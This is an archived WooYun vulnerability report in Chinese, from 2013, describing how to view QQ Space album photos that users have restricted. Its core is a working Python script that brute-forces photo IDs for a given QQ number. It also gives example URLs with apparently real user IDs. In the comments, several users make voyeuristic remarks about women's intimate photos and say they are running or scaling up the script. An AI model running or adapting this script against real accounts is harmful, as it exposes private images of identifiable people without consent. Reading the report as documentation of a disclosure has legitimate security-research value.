当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021225

漏洞标题:获取无权限察看的QQ空间中的相片

相关厂商:腾讯

漏洞作者: voxdei

提交时间:2013-04-04 12:32

修复时间:2013-04-07 09:37

公开时间:2013-04-07 09:37

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-04: 细节已通知厂商并且等待厂商处理中
2013-04-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

即使用户空间/相册需要权限访问,仍可自由访问动感相册

详细说明:

patt = 'http://photo.qq.com/cgi-bin/common/cgi_load_flash?uin=%s&fid=%s'
errmsg = urllib2.urlopen(patt % (uin, '99999')).read()
data = dict()
for i in range(100000):
	fid=str(i).zfill(5)
	url = patt % (uin, fid)
	resp = urllib2.urlopen(url).read()
	if resp != errmsg:
		data[fid] = resp

漏洞证明:

随便给两个例子
http://photo.qq.com/cgi-bin/common/cgi_load_flash?uin=252838351&fid=13352
http://photo.qq.com/cgi-bin/common/cgi_load_flash?uin=446565247&fid=12873
空间都有访问权限,但通过以上网址可以获取照片

修复方案:

加入访问权限和验证码

版权声明:转载请注明来源 voxdei@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-04-07 09:37

厂商回复:

非常感谢您的报告。这个问题我们经过评估,暂未发现可以对用户或者业务产生影响,故不作处理。如果您对于该结论有任何的疑问,欢迎反馈指正,我们会有专人跟进处理。

漏洞Rank:3 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2013-04-04 17:17 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    MM我来了

  2. 2013-04-04 17:33 | n3wF ( 路人 | Rank:6 漏洞数:2 )

    =。=这个给力啊,妹子的照片,艳照

  3. 2013-04-04 17:52 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    这也行

  4. 2013-04-04 18:43 | 灵魂天使 ( 路人 | Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)

    貌似是那个动感影集里的

  5. 2013-04-04 18:43 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    绕过权限限制下载相册?不错啊

  6. 2013-04-04 22:47 | Croxy ( 普通白帽子 | Rank:513 漏洞数:54 | 只会送人头)

    MARK

  7. 2013-04-05 00:01 | dtc ( 路人 | Rank:10 漏洞数:1 | 业余技术爱好者,来乌云学习。)

    看看

  8. 2013-04-05 02:14 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    半夜寂寞的等待公开中

  9. 2013-04-05 10:12 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    仍可自由访问动感相册 是不是可以发现神马 楼下你怎么看

  10. 2013-04-05 11:01 | 猥琐 ( 路人 | Rank:6 漏洞数:2 | 学习什么的最重要!)

    额,有权限看的朋友@过去也行的吧

  11. 2013-04-07 10:05 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @猥琐 @Blackeagle @dtc @Croxy @无敌L.t.H @n3wF 公开鸟,大家来看看咋用?

  12. 2013-04-07 10:34 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    都好几年的东西了 洞主又在哪儿看到的?

  13. 2013-04-07 12:09 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    在跑了 速度有点慢啊

  14. 2013-04-07 12:09 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Finger 这个是的确存在的吧

  15. 2013-04-07 13:32 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @xsser 确实存在 还有 BJ消防物联网那个 我12年就提交了 至今未审核

  16. 2013-04-07 14:35 | 无尾熊 ( 路人 | Rank:14 漏洞数:2 | 菜鸟一枚。。。学习安全技术中。 。。)

    @xsser 求脚本,这个fid生成的算法是什么啊?求大神指点,暴力基本不能跑出来。。

  17. 2013-04-07 18:11 | 笑傲浆糊 ( 路人 | Rank:12 漏洞数:1 | 没死,还活在)

    暴力算fid?有点慢啊,写了个多线程在跑,但貌似目标QQ木有动态相册

  18. 2013-04-07 20:34 | voxdei ( 路人 | Rank:3 漏洞数:1 | 风一样的男子)

    @Finger 拜托,是在 fiddler 里看到的,understand?

  19. 2013-04-07 22:33 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @voxdei 很久以前的了 貌似是零几年的时候就有了

  20. 2013-04-09 03:28 | Errorera ( 普通白帽子 | Rank:112 漏洞数:21 | 我们应该在犯错误的情况下学习!)

    我个人感觉,要是目标没有动感相册,你这个漏洞,就基本没什么作用。。

  21. 2013-04-09 03:51 | voxdei ( 路人 | Rank:3 漏洞数:1 | 风一样的男子)

    @Finger 那就是腾讯觉得这个漏洞无所谓吧 ╮(╯_╰)╭